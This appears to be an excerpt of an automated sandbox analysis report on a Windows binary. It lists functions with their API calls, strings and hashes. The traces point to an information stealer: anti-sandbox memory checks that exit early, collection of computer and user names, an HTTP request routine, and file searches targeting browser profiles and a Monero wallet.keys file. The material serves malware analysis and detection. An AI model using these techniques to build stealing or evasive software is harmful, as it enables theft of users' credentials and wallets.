                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
                              • Instruction ID: 59dfec1067963076c170827c5bec08f89c48f6de136ff51b5f27038e3c085a26
                              • Opcode Fuzzy Hash: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
                              • Instruction Fuzzy Hash: 3311FE30954148ABEB14FFB4DD52FED7339AF90304F404558F81A5B592EF74AB05CA92
                              Function 00931220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1261 931220-931247 call 9489b0 GlobalMemoryStatusEx 1264 931273-93127a 1261->1264 1265 931249-931271 call 94da00 * 2 1261->1265 1267 931281-931285 1264->1267 1265->1267 1269 931287 1267->1269 1270 93129a-93129d 1267->1270 1272 931292-931294 ExitProcess 1269->1272 1273 931289-931290 1269->1273 1273->1270 1273->1272
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                              • ExitProcess.KERNEL32 ref: 00931294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                              • Instruction ID: 463eba9c32cc48e7169ca00852a71cca200f6cb717b0b7fc970ebd5685d215a5
                              • Opcode Fuzzy Hash: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                              • Instruction Fuzzy Hash: AF011DB0D44308BBEB10EFE4CC49F9EBB78AB54705F208049E709B62D0DB7459458B99
                              Function 00931110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                              • ExitProcess.KERNEL32 ref: 00931143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                              • Instruction ID: bead969e56557794c731b591a9bb60568cd525602bc9698c328cb8202172a78c
                              • Opcode Fuzzy Hash: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                              • Instruction Fuzzy Hash: 2CE0E670949308FBE7546BA09D0AB4D7678AB44B02F104154F70D771D0DAB52A419A9A
                              Function 009310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009310B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009310F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                              • Instruction ID: 5dca9fdf59d64c67696f6ee4f5887d58a550bb4bba7be8d3dc71b27ab5701e44
                              • Opcode Fuzzy Hash: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                              • Instruction Fuzzy Hash: B4F0E2B1641208BBE7189AA4AC59FAFB7ECE705B15F300848F504E7290D9719F40CAA1
                              Function 00931190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                              • ExitProcess.KERNEL32 ref: 009311C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                              • Instruction ID: 5b2c2f9dee3526044eebb7e959109a0423212101a18a083f4f896e0a902c79ef
                              • Opcode Fuzzy Hash: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                              • Instruction Fuzzy Hash: 1AE017B991830553CA4477F0AC8BF2F369C5B9474AF040828FA09D3212FE65E8408A6A

                              Non-executed Functions

                              Function 009438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 009438CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 009438E3
                              • lstrcat.KERNEL32(?,?), ref: 00943935
                              • StrCmpCA.SHLWAPI(?,00950F70), ref: 00943947
                              • StrCmpCA.SHLWAPI(?,00950F74), ref: 0094395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00943C67
                              • FindClose.KERNEL32(000000FF), ref: 00943C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                              • Instruction ID: 8af562d82ad61dd9c9b84dbf0f8a5beef6f18036d4d1898a9a8019a70e488474
                              • Opcode Fuzzy Hash: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                              • Instruction Fuzzy Hash: F3A111B1A00218ABDB64EFA4DC85FEE7379BB84301F048588B95D97141EB759B84CF62
                              Function 0093BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00950B32,00950B2B,00000000,?,?,?,009513F4,00950B2A), ref: 0093BEF5
                              • StrCmpCA.SHLWAPI(?,009513F8), ref: 0093BF4D
                              • StrCmpCA.SHLWAPI(?,009513FC), ref: 0093BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0093C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                              • Instruction ID: ff7bda6e7b9fe4b4c13dcbe5a24ab4b5d624dd29f82e1fd4c0260ad778ba0333
                              • Opcode Fuzzy Hash: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                              • Instruction Fuzzy Hash: E6425072950104ABEB14FB70DD96FEE737DABC4304F404558B90AA7191EE34AB49CFA2
                              Function 00944910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0094492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00944943
                              • StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                              • StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                              • FindClose.KERNEL32(000000FF), ref: 00944B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                              • Instruction ID: b75513e1704713cf8d4b8524e603094fd6c09e860b089f476d4f7866636f0df6
                              • Opcode Fuzzy Hash: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                              • Instruction Fuzzy Hash: 546101B2900218ABCB64EBA0DC45FEE737CBBC8705F044598B50D96151EE75EB89CF92
                              Function 00944570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                              • wsprintfA.USER32 ref: 009445A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                              • StrCmpCA.SHLWAPI(?,00950FC4), ref: 009445EB
                              • StrCmpCA.SHLWAPI(?,00950FC8), ref: 00944601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0094468B
                              • FindClose.KERNEL32(000000FF), ref: 009446A0
                              • lstrcat.KERNEL32(?,010FE278), ref: 009446C5
                              • lstrcat.KERNEL32(?,010FD1E0), ref: 009446D8
                              • lstrlen.KERNEL32(?), ref: 009446E5
                              • lstrlen.KERNEL32(?), ref: 009446F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                              • Instruction ID: a3ea04865d1a8775717acebcbb0d755b82b693f5a6bae8c627101b890dd8dbfb
                              • Opcode Fuzzy Hash: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                              • Instruction Fuzzy Hash: 855134B2550218ABC764EB70DC89FED737CAB98701F404588F60D97190EF749B858F92
                              Function 00943EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00943EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00943EDA
                              • StrCmpCA.SHLWAPI(?,00950FAC), ref: 00943F08
                              • StrCmpCA.SHLWAPI(?,00950FB0), ref: 00943F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0094406C
                              • FindClose.KERNEL32(000000FF), ref: 00944081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                              • Instruction ID: 716d7f364e542b293e518b088a042c520d22bde7c2704b40cc3adc2a37f0f6a0
                              • Opcode Fuzzy Hash: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                              • Instruction Fuzzy Hash: A95113B2900218ABCB24EBB0DC85FEE737CBBD4304F404588B65D96151EF75AB898F91
                              Function 0093ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0093ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0093ED55
                              • StrCmpCA.SHLWAPI(?,00951538), ref: 0093EDAB
                              • StrCmpCA.SHLWAPI(?,0095153C), ref: 0093EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0093F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
